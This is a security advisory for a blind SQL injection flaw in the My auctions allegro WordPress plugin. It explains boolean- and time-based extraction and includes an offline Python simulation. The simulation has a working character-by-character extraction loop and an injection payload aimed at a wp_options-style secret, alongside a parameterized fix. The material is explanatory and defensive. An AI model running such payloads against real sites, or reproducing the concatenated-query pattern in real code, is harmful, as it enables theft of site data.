Impact
Improper neutralization of special elements used in an SQL command (CWE-89) in the My auctions allegro WordPress plugin allows an attacker to perform blind SQL injection. Untrusted request input reaches a database query without proper escaping or parameterization, so crafted input can change the logic of the query rather than being treated as a plain value. The flaw can be leveraged to read, modify, or delete data stored in the site's database, potentially exposing sensitive user information or giving the attacker control over critical application data. The weakness is a classic SQL Injection (CWE-89).
Affected Systems
WordPress sites running the wphocus My auctions allegro plugin are affected in all versions up to and including 3.6.20. The advisory does not name a fixed release, so administrators should treat any install at 3.6.20 or older as vulnerable and check the vendor's changelog for a newer version, or disable the plugin until one is available.
Risk and Exploitability
The CVSS score of 8.5 indicates high severity. The EPSS score of less than 1% suggests that the probability of exploitation in the near term is low, though a SQL injection in a public-facing WordPress plugin remains a significant risk. The flaw is not listed in the CISA KEV catalog. An attacker would need to supply crafted input to the plugin's public interface, most likely through a form field or URL parameter that the plugin concatenates into a database query. Because the injection is blind, the query's output is never returned to the attacker directly; instead the attacker submits a series of true/false conditions and infers the data one character at a time from differences in the page's response (boolean-based) or from deliberate delays such as a MySQL SLEEP() call (time-based). This makes extraction slower than with a classic error-based or UNION-based injection, but no less complete. According to the advisory, the vulnerability does not require privileged access and can be exploited remotely by unauthenticated users; the CVSS vector itself is not reproduced here, so the exact prerequisites should be confirmed against the original advisory before prioritizing remediation.
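To make the mechanics concrete, the following is an added, self-contained simulation of the boolean-based blind extraction described above. It is not the plugin's code and does not reproduce the real vulnerable query: SQLite stands in for the WordPress MySQL database, and the table names, column names and secret value are constructed for the demo. It contrasts the CWE-89 pattern (request input concatenated into SQL) with a parameterized query, and shows that the same payload that leaks the secret through the vulnerable handler yields nothing through the hardened one.

```python
"""Blind (boolean-based) SQL injection, simulated offline.

Added illustration for this advisory, not code from the My auctions
allegro plugin. Table/column names and the secret are constructed; SQLite
stands in for the WordPress MySQL database.
"""
import sqlite3
import string

# Constructed sample data (not from the advisory).
SECRET = "wp_tok_4f9a"
ALPHABET = string.ascii_lowercase + string.digits + "_"


def make_db():
    """Build an in-memory database with a public table and a secret option."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE wp_auctions (id INTEGER, title TEXT)")
    db.execute("CREATE TABLE wp_options (option_name TEXT, option_value TEXT)")
    db.executemany("INSERT INTO wp_auctions VALUES (?, ?)",
                   [(1, "Laptop"), (2, "Camera")])
    db.execute("INSERT INTO wp_options VALUES (?, ?)",
               ("plugin_api_token", SECRET))
    return db


def vulnerable_lookup(db, auction_id):
    """CWE-89 pattern: the request parameter is concatenated into the SQL."""
    sql = "SELECT title FROM wp_auctions WHERE id = " + str(auction_id)
    return db.execute(sql).fetchone()


def hardened_lookup(db, auction_id):
    """Parameter binding: the value can never alter the query structure.
    The WordPress equivalent is $wpdb->prepare("... WHERE id = %d", $id)."""
    sql = "SELECT title FROM wp_auctions WHERE id = ?"
    return db.execute(sql, (auction_id,)).fetchone()


def page_shows_result(lookup, db, payload):
    """All a blind attacker observes: did the page render a row or not?"""
    try:
        return lookup(db, payload) is not None
    except sqlite3.Error:
        return False


def extract_secret(db, lookup, max_len=20):
    """Recover wp_options.option_value one character at a time, using the
    row/no-row behaviour of the page as a true/false oracle."""
    recovered = ""
    for pos in range(1, max_len + 1):
        for ch in ALPHABET:
            # Hypothetical payload: valid id ANDed with a guess about one char.
            payload = (
                "1 AND (SELECT substr(option_value,%d,1) FROM wp_options "
                "WHERE option_name='plugin_api_token') = '%s'" % (pos, ch)
            )
            if page_shows_result(lookup, db, payload):
                recovered += ch
                break
        else:
            break  # no character matched: end of the value
    return recovered


if __name__ == "__main__":
    db = make_db()
    print("vulnerable handler leaks:", extract_secret(db, vulnerable_lookup))
    print("hardened handler leaks:  ", repr(extract_secret(db, hardened_lookup)))
```

Each oracle query costs one request per candidate character, which is why blind extraction is slow but still deterministic; a time-based variant replaces the row/no-row check with a measured delay and is otherwise identical. In the hardened handler the whole payload is bound as a single value that never equals an integer id, so the oracle returns false for every guess.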